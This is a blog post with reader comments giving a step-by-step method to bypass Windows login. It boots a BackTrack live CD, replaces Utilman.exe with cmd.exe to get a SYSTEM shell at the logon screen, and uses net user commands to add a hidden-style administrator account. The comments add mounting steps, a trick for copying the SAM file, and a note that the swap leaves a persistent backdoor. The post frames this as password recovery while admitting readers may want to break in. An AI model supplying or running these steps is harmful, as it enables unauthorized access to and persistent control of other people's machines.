Why hack Windows passwords when you can simply create yourself a new Administrator account?
In a previous post I showed how you can use an Ophcrack Live CD to hack Windows passwords in minutes. It works, I’ve done it before and it really works. The free, open source Ophcrack Live CD is a Windows account password cracking tool designed to help you recover lost Windows passwords. Quite a few people have sent me emails or chatted me via my website saying “I forgot my password”, or “my kid locked himself out of his pc”. I’m unsure if that’s really the case or if they were just looking for a way to hack Windows passwords. However, if that is really the case there is potentially a much faster way to resolve your issue… just create a new Administrator account!
To create a new Administrator account you’ll want to grab a copy of the Offensive Security’s BackTrack Live CD which can be found here.
What is BackTrack and how do I hack Windows with it?
BackTrack is the result of the merging of two Innovative Penetration Testing live Linux distributions – Whax and Auditor. BackTrack has been dubbed as the best Security Live CD today, and has been rated 1st in its category, and 32nd overall in Insecure.org. Based on SLAX (Slackware), BackTrack provides user modularity. This means the distribution can be easily customised by the user to include personal scripts, additional tools, customized kernels, etc.
- BackTrack Terminal Window
Hack Windows and make a new user account
Here’s a quick and dirty way to make a new user account.
Boot into Backtrack and open a shell prompt:
- cd /mnt (change directory to mounted drives)
- ls (get the list of mounted drives)
- cd sda1 (sda1 is the main hard drive)
- cd Windows/ (change to the windows directory)
- cd System32/ (change to the system directory)
- mv Utilman.exe Utilman.old (backup original file)
- cp cmd.exe Utilman.exe (copy cmd.exe as utilman.exe)
- reboot
Once rebooted, at vista logon screen do the following:
- Press Windows key + U
- To invoke Utility Manager ( A.K.A. CMD.exe)
- Cmd.exe will spawn with ‘System’ privileges.
- c:>net user S00perAdmin mypassword /add
- c:>net localgroup administrators S00perAdmin /add
- Reboot and log in with your newly added Admin account
There ya go… now instead of needing to “crack” you “lost” password you can simply create a new Administrator account, login with that and then change the lost accounts password to what you want it to be.
Related posts:
This step-by-step instruction is incomplete. It leaves a copy of cmd.exe as utilman.exe and the hotkeys will continue to provide a system privilege command shell at the secure desktop login screen. It’s like a security/firedoor with multiple deadbolt locks (and a master key under the welcome mat).
if you create a new Admin account, what will happen to the old Admin account? Does that mean that there will be two Administrator accounts? Please reply ASAP. Thanks
You’d have both accounts. There is no issue with a Windows machine having multiple administrator accounts.
Hi there Paul,
I have a couple of questions regarding this method you’ve posted and would appreciate if you took the time to answer them.
First off, how likely is it that this solution would work on Windows7?
Secondly,
c:\>net user S00perAdmin mypassword /add
Written like that, i assume the name of the account would be S00perAdmin followed by my password of choice – however can I just ignore typing a password to leave it without one? ( and is it always “localgroup administrators” or may it differ depending on region? )
Really appreciate you wrote this guide, hoping you’ll answer my questions aswell,
Lenny.
Given that 7 is built off of Vista, it’s pretty damned likely. That said, I haven’t tried it myself.
You should never use an account without a password. If you need one without a PW use the built in guest account.
This sounds pretty interesting. We used a similar software at my tech support job a few years ago. Called “Windows Password Key 8.0″.
It works very prefect to regain your password .Also use boot CD/DVD.
Great article.
Just used BackTrack 5 to create a S00perAdmin on Windows 7 Sp1.
(Needed it to resolve ms kb947215)
Solution worked almost perfectly.
My drive didn’t auto mount so I needed to do the following in addition to the above steps:
mkdir mnt/sda1
mount /dev/sda1 mnt/sda1
Thanks again.
You don’t need backtrack, you can use any live CD distribution that can mount NTFS volumes, almost every liveCD can do it.
Nahh just use HBCD (heirens boot cd) its a portable (hacked”ish”) xp with tools ranging from MBR editing – to copying all stored serials…. and it can copy windows folder attributes….
i have learned that you can just carry some certain files found in the “system32\config” directory and overwrite them on any windows computer to use a portable ‘universal’ account file “SAM”. of course it olnly works on that os….
I’ve had this Demo unit I purchased and can’t get into it, I’ve had the darned thing a year or more now and My wife needs to have her own stand alone unit for returning to school at 50, we are BROKE I don’t have VISA, can’t pay anything, just got back from the food bank. can anybody offer em a simple FREE way to gain access? please help ???
I have managed to get Backtrack and used it to get to the cmd.exe as utilman.exe i was able to set a new password but the net local group administrators sooperadmin/add has me confused (Im not good at the computer lingo) how exactly should it be entered into the cmd?